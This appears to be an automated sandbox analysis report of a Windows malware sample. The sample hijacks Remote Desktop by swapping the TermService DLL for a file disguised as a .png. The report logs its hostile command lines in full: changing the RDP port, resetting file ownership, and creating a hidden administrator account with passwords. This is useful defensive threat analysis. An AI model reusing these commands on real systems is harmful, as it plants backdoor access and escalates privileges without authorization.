cbcfad5e750f0e032d59c23e09a993471555360688c4cd59b8ba7b896c2e4b88

Analysis

max time kernel
145s
max time network
142s
platform
windows7_x64
resource
win7v20201028
submitted
17-11-2020 12:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63a4fa287d067ff9083c6d2bf5735016.exe
Size

3.1MB
MD5

c6ebdaa3c37a66c4e19964b77df4c1bb
SHA1

826e46cec09b7e0748b62fb398d3e955edb3cc9d
SHA256

cbcfad5e750f0e032d59c23e09a993471555360688c4cd59b8ba7b896c2e4b88
SHA512

63423c6ef2128a3da43a64dbd4669c54c5aca01d32886c51f37b915d64f0a61cd852c5f505d6b1fd6c220ce787e1f091e8038733ee617c36eb3dc2c4dd7f78a9

Score

9^/10

discovery exploit persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1164 icacls.exe
1336 takeown.exe
1964 icacls.exe
1020 icacls.exe
1900 icacls.exe
1496 icacls.exe
1064 icacls.exe
548 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1164	icacls.exe
1336	takeown.exe
1964	icacls.exe
1020	icacls.exe
1900	icacls.exe
1496	icacls.exe
1064	icacls.exe
548	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

1756
1756
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1900 icacls.exe
1496 icacls.exe
1064 icacls.exe
548 icacls.exe
1164 icacls.exe
1336 takeown.exe
1964 icacls.exe
1020 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
1756
1756

pid	process
1900	icacls.exe
1496	icacls.exe
1064	icacls.exe
548	icacls.exe
1164	icacls.exe
1336	takeown.exe
1964	icacls.exe
1020	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

840 reg.exe
Runs net.exe

pid	process
840	reg.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1712	powershell.exe
1712	powershell.exe
1100	powershell.exe
1100	powershell.exe
680	powershell.exe
680	powershell.exe
1636	powershell.exe
1636	powershell.exe
1712	powershell.exe
1712	powershell.exe
1712	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

468
1756
1756
1756
1756

pid	process
468
1756
1756
1756
1756

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exe

description	pid	process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	680	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeRestorePrivilege	1020	icacls.exe

Suspicious use of WriteProcessMemory 130 IoCs

Processes:

63a4fa287d067ff9083c6d2bf5735016.exepowershell.execsc.exenet.execmd.exe

description	pid	process	target process
PID 1684 wrote to memory of 1712	1684	63a4fa287d067ff9083c6d2bf5735016.exe	powershell.exe
PID 1684 wrote to memory of 1712	1684	63a4fa287d067ff9083c6d2bf5735016.exe	powershell.exe
PID 1684 wrote to memory of 1712	1684	63a4fa287d067ff9083c6d2bf5735016.exe	powershell.exe
PID 1684 wrote to memory of 1712	1684	63a4fa287d067ff9083c6d2bf5735016.exe	powershell.exe
PID 1712 wrote to memory of 1568	1712	powershell.exe	csc.exe
PID 1712 wrote to memory of 1568	1712	powershell.exe	csc.exe
PID 1712 wrote to memory of 1568	1712	powershell.exe	csc.exe
PID 1568 wrote to memory of 1036	1568	csc.exe	cvtres.exe
PID 1568 wrote to memory of 1036	1568	csc.exe	cvtres.exe
PID 1568 wrote to memory of 1036	1568	csc.exe	cvtres.exe
PID 1712 wrote to memory of 1100	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 1100	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 1100	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 680	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 680	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 680	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 1636	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 1636	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 1636	1712	powershell.exe	powershell.exe
PID 1712 wrote to memory of 1336	1712	powershell.exe	takeown.exe
PID 1712 wrote to memory of 1336	1712	powershell.exe	takeown.exe
PID 1712 wrote to memory of 1336	1712	powershell.exe	takeown.exe
PID 1712 wrote to memory of 1964	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1964	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1964	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1020	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1020	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1020	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1900	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1900	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1900	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1496	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1496	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1496	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1064	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1064	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1064	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 548	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 548	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 548	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1164	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1164	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1164	1712	powershell.exe	icacls.exe
PID 1712 wrote to memory of 1792	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 1792	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 1792	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 840	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 840	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 840	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 564	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 564	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 564	1712	powershell.exe	reg.exe
PID 1712 wrote to memory of 1416	1712	powershell.exe	net.exe
PID 1712 wrote to memory of 1416	1712	powershell.exe	net.exe
PID 1712 wrote to memory of 1416	1712	powershell.exe	net.exe
PID 1416 wrote to memory of 340	1416	net.exe	net1.exe
PID 1416 wrote to memory of 340	1416	net.exe	net1.exe
PID 1416 wrote to memory of 340	1416	net.exe	net1.exe
PID 1712 wrote to memory of 1896	1712	powershell.exe	cmd.exe
PID 1712 wrote to memory of 1896	1712	powershell.exe	cmd.exe
PID 1712 wrote to memory of 1896	1712	powershell.exe	cmd.exe
PID 1896 wrote to memory of 1684	1896	cmd.exe	cmd.exe
PID 1896 wrote to memory of 1684	1896	cmd.exe	cmd.exe
PID 1896 wrote to memory of 1684	1896	cmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\63a4fa287d067ff9083c6d2bf5735016.exe
"C:\Users\Admin\AppData\Local\Temp\63a4fa287d067ff9083c6d2bf5735016.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1684

\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h2ho53vk\h2ho53vk.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C30.tmp" "c:\Users\Admin\AppData\Local\Temp\h2ho53vk\CSC315E6786A4B544E09F5FFD97CBA384FF.TMP"
4⤵
PID:1036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1336

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1964

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1900

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1496

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1064

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:548

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1164

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:1792

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:840

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:564

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:340

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
PID:1684

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:872

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:1616

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:272

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:1088

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:924

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:1708

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
PID:1012

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
PID:1720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:1900

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc kB7EtOT0 /add
1⤵
PID:1788

C:\Windows\system32\net.exe
net.exe user wgautilacc kB7EtOT0 /add
2⤵
PID:1604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc kB7EtOT0 /add
3⤵
PID:548

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1792

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
PID:564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:1080

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
1⤵
PID:928

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
2⤵
PID:1872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
3⤵
PID:1684

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:324

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
PID:920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:1020

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc kB7EtOT0
1⤵
PID:992

C:\Windows\system32\net.exe
net.exe user wgautilacc kB7EtOT0
2⤵
PID:404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc kB7EtOT0
3⤵
PID:1064

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:848

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:1720

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_067d8a02-3033-42a4-8d12-40d3952a20ff
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4a116717-c371-438b-b312-009832fa14dd
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_87cd202a-e1b0-4253-b2d9-f0e20d79369b
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_95827349-e186-400f-93c8-d3ccccd08284
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9e8488d1-5da3-4bf6-a226-e8bbc6e6ff4c
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cd94e883-66a5-419a-bc2d-2a25f7ffe418
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f132e874-f405-415c-8027-23854727528e
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
a862a44f9a04e44dbcf2c2f4f29ac465

SHA1
226d779b8fda8b23910e24f3943808e6d7a0c2e5

SHA256
ec5fb6a931027480fbbd8592ccfea80f3a50436114176b95b1e6e4164177b9b5

SHA512
28cbb1cb18ff1fdf4d06b0d49fd16c272fb194cbdb5e0f1b282fc165965ff463d44e65e92f8ce45103c9bc0e320d3058a13b631aeb9323957e68d2a755a633da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
7d732bcb8e4307fa8a69c39070b1bc94

SHA1
fe8850788056f5dea4da3a7a372d2504af55dfdf

SHA256
dff194104b00dc8495be253ccca55f06cef42d70a5790a74d7dcb4a526e0713e

SHA512
0eac4a4114baa73d2e2a9887b4cb53214435a7c7fadfb9c16441e83f26df9a7535e4b81879d76fd7b037da14ce8d4454992a595f03c5dee107ced45b5c349b98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
9ea70926a889834b4bfb3face8ed4944

SHA1
c2204a1f97043e02b7a89a86e729c1307e153379

SHA256
01219107e60b8b20e72289df08aee04752a4d6a8a12fa13ba9283832a16dbbf4

SHA512
c4e593e2d48c807c6d44b4587c7e21e77ce767abd58bab0bc4f62b9d9d15cffcd121b6ea8bb841a2ccfb0c74a2a8ad04f433f0a9c6750fb0b292e7b626f3cdd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
c36d57cabe6e7a542371f07b20781551

SHA1
7c2a671633dc7850889ec94d5a6b99f5231888da

SHA256
afb1c92bce4ad6093eca4754baa390bb0f682605b46758f26b435819d9f7eda9

SHA512
e991d4bc2ecdb284915217b69a68a8816a46ff8bfb6f4cfc658387340ef1f7c71829e88a88530a924fa06bacf1d4fd1fdb648f3e63dfa0aa4c39f7f9d434361e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
ac192ba6e412b1b85b0566c457a08260

SHA1
db495ec9db1a04b4de561a6b53ae46d755f85d05

SHA256
e281c112858881cd78dfbf7a4b01ed063358f88af0cb8508a6c9a53ceb03a88f

SHA512
b50c359f5c90691cefca5298f7b2680267d0eda922c9e0c454e15454949a9258630664f0fd3340a018975913a3ffd189dc2c8ccbe2685b914d7735a11d8b6d27

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9C30.tmp
MD5
75d3a8beb44780a80693cae0db9b3196

SHA1
8629602fc45b8fd53c81130e3ac46842e917f0ec

SHA256
addbf66683a904c16a9a11d0836b59e5404ff6b5635b9f46ab137cece3bfd51c

SHA512
8b61843e26b5a03c4a6d30258b54575b8f7dd1efe6f5515f86dcfbeaa6cc508bbb11e32faacb3ca7341f1bf5476976dfda983af3e9f8148b11bfa7d1f0a1b7b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
C:\Users\Admin\AppData\Local\Temp\h2ho53vk\h2ho53vk.dll
MD5
25d1da27a508ba5ccc9f7da41bb3f32a

SHA1
54f69dd503e09cc5cd90d7cdfd6f5996f32ca1cc

SHA256
87bf69e2e5488ca2e00eff67b3605681e44c553380a2c268c05f391af4e9d919

SHA512
0fbdc5f229981169b12dbe2f709409770905c5f0b0bc2dd1052f81dc9cb9b3c36a95b3ba5f04879be88fea9bc432f29e15b8230d33c82eeb1fb3f15650d5c7b8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
27ead4ebf53da357a912067e9649210e

SHA1
4975e9953922bdc6633a10081f63e9e4c73ae819

SHA256
82185a1f5747a563a70a8078da017a67b75c7a2839b9b6d1ab0dc58a7e91c67e

SHA512
4a45b531864dfa8ba33ae3b0622f36480c220c6a18229dced28b2c3644d55c0d4f4bfd55c7067509d6357fe894553e0f1d699097d61dfae16320ebeed3800eab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
27ead4ebf53da357a912067e9649210e

SHA1
4975e9953922bdc6633a10081f63e9e4c73ae819

SHA256
82185a1f5747a563a70a8078da017a67b75c7a2839b9b6d1ab0dc58a7e91c67e

SHA512
4a45b531864dfa8ba33ae3b0622f36480c220c6a18229dced28b2c3644d55c0d4f4bfd55c7067509d6357fe894553e0f1d699097d61dfae16320ebeed3800eab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
27ead4ebf53da357a912067e9649210e

SHA1
4975e9953922bdc6633a10081f63e9e4c73ae819

SHA256
82185a1f5747a563a70a8078da017a67b75c7a2839b9b6d1ab0dc58a7e91c67e

SHA512
4a45b531864dfa8ba33ae3b0622f36480c220c6a18229dced28b2c3644d55c0d4f4bfd55c7067509d6357fe894553e0f1d699097d61dfae16320ebeed3800eab

Download Submit
C:\Windows\system32\rfxvmt.dll
MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
